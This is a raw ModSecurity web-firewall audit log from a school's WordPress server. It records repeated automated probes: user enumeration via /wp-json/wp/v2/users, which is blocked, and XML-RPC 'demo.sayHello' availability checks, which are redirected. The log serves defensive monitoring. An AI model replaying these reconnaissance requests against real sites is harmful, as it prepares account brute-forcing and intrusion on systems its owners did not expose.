Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f0927f-Z-- --80e79400-A-- [17/May/2025:07:19:02 +0700] aCfV9um4kjNN-hEbWjJAtQAAAFg 103.236.140.4 42644 103.236.140.4 8181 --80e79400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80e79400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e79400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441142460789 2598 (- - -) Stopwatch2: 1747441142460789 2598; combined=1051, p1=366, p2=663, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e79400-Z-- --4c820b31-A-- [17/May/2025:07:19:07 +0700] aCfV--m4kjNN-hEbWjJAtgAAAEI 103.236.140.4 42646 103.236.140.4 8181 --4c820b31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c820b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c820b31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441147653966 2807 (- - -) Stopwatch2: 1747441147653966 2807; combined=1241, p1=438, p2=774, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c820b31-Z-- --34876255-A-- [17/May/2025:07:19:10 +0700] aCfV_gTOsBn9MSWb6WJt5gAAAIo 103.236.140.4 42652 103.236.140.4 8181 --34876255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34876255-C-- demo.sayHello --34876255-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34876255-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441150186227 5032 (- - -) Stopwatch2: 1747441150186227 5032; combined=3807, p1=501, p2=3096, p3=21, p4=23, p5=96, sr=119, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34876255-Z-- --0fdeea48-A-- [17/May/2025:07:19:14 +0700] aCfWAhKi5m5upc8uMd6hvQAAAMY 103.236.140.4 42654 103.236.140.4 8181 --0fdeea48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fdeea48-C-- demo.sayHello --0fdeea48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fdeea48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441154476487 6225 (- - -) Stopwatch2: 1747441154476487 6225; combined=4388, p1=563, p2=3585, p3=31, p4=35, p5=102, sr=81, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fdeea48-Z-- --2db1be19-A-- [17/May/2025:07:20:19 +0700] aCfWQ3yxdQCiyU1ENFcmywAAABQ 103.236.140.4 42662 103.236.140.4 8181 --2db1be19-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2db1be19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db1be19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441219650848 3272 (- - -) Stopwatch2: 1747441219650848 3272; combined=1431, p1=500, p2=900, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db1be19-Z-- --5bbb6d18-A-- [17/May/2025:07:20:24 +0700] aCfWSBKi5m5upc8uMd6hvgAAAMc 103.236.140.4 42666 103.236.140.4 8181 --5bbb6d18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bbb6d18-C-- demo.sayHello --5bbb6d18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bbb6d18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441224953582 4952 (- - -) Stopwatch2: 1747441224953582 4952; combined=3836, p1=469, p2=3142, p3=28, p4=27, p5=99, sr=68, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bbb6d18-Z-- --0928df33-A-- [17/May/2025:07:20:39 +0700] aCfWV3yxdQCiyU1ENFcmzgAAAAE 103.236.140.4 42680 103.236.140.4 8181 --0928df33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0928df33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0928df33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441239656342 2911 (- - -) Stopwatch2: 1747441239656342 2911; combined=1254, p1=437, p2=788, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0928df33-Z-- --56a2132c-A-- [17/May/2025:07:20:48 +0700] aCfWYHyxdQCiyU1ENFcm0AAAAAM 103.236.140.4 42684 103.236.140.4 8181 --56a2132c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56a2132c-C-- demo.sayHello --56a2132c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56a2132c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441248905849 5870 (- - -) Stopwatch2: 1747441248905849 5870; combined=4235, p1=555, p2=3418, p3=33, p4=35, p5=125, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56a2132c-Z-- --76ba9432-A-- [17/May/2025:07:21:07 +0700] aCfWc3yxdQCiyU1ENFcm0gAAAAU 103.236.140.4 42688 103.236.140.4 8181 --76ba9432-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76ba9432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ba9432-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441267189622 2826 (- - -) Stopwatch2: 1747441267189622 2826; combined=1278, p1=425, p2=824, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ba9432-Z-- --fa081e7e-A-- [17/May/2025:07:21:12 +0700] aCfWeHyxdQCiyU1ENFcm1AAAAAg 103.236.140.4 42692 103.236.140.4 8181 --fa081e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa081e7e-C-- demo.sayHello --fa081e7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa081e7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441272925499 4104 (- - -) Stopwatch2: 1747441272925499 4104; combined=3176, p1=380, p2=2620, p3=21, p4=22, p5=78, sr=58, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa081e7e-Z-- --5a8de50e-A-- [17/May/2025:07:21:28 +0700] aCfWiHyxdQCiyU1ENFcm1QAAAAk 103.236.140.4 42696 103.236.140.4 8181 --5a8de50e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a8de50e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8de50e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441288319508 2816 (- - -) Stopwatch2: 1747441288319508 2816; combined=1279, p1=426, p2=823, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8de50e-Z-- --879c531c-A-- [17/May/2025:07:21:33 +0700] aCfWjRKi5m5upc8uMd6hwgAAAM0 103.236.140.4 42700 103.236.140.4 8181 --879c531c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --879c531c-C-- demo.sayHello --879c531c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --879c531c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441293358571 5965 (- - -) Stopwatch2: 1747441293358571 5965; combined=4208, p1=562, p2=3434, p3=35, p4=40, p5=83, sr=72, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879c531c-Z-- --7233480e-A-- [17/May/2025:07:22:09 +0700] aCfWsXyxdQCiyU1ENFcm1wAAAAs 103.236.140.4 42704 103.236.140.4 8181 --7233480e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7233480e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7233480e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441329598457 2803 (- - -) Stopwatch2: 1747441329598457 2803; combined=1166, p1=388, p2=747, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7233480e-Z-- --78f61822-A-- [17/May/2025:07:22:20 +0700] aCfWvBKi5m5upc8uMd6hxAAAAM8 103.236.140.4 42708 103.236.140.4 8181 --78f61822-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78f61822-C-- demo.sayHello --78f61822-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f61822-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441340547617 4731 (- - -) Stopwatch2: 1747441340547617 4731; combined=3719, p1=453, p2=3028, p3=24, p4=25, p5=108, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f61822-Z-- --055db62d-A-- [17/May/2025:07:23:44 +0700] aCfXEATOsBn9MSWb6WJt6gAAAJE 103.236.140.4 42712 103.236.140.4 8181 --055db62d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --055db62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --055db62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441424289344 3547 (- - -) Stopwatch2: 1747441424289344 3547; combined=1500, p1=475, p2=993, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --055db62d-Z-- --94a6ca18-A-- [17/May/2025:07:23:45 +0700] aCfXEQTOsBn9MSWb6WJt6wAAAJI 103.236.140.4 42716 103.236.140.4 8181 --94a6ca18-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94a6ca18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94a6ca18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441425670552 2422 (- - -) Stopwatch2: 1747441425670552 2422; combined=1120, p1=379, p2=713, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94a6ca18-Z-- --5d3c5c37-A-- [17/May/2025:07:23:52 +0700] aCfXGHyxdQCiyU1ENFcm2wAAABI 103.236.140.4 42726 103.236.140.4 8181 --5d3c5c37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d3c5c37-C-- demo.sayHello --5d3c5c37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d3c5c37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost 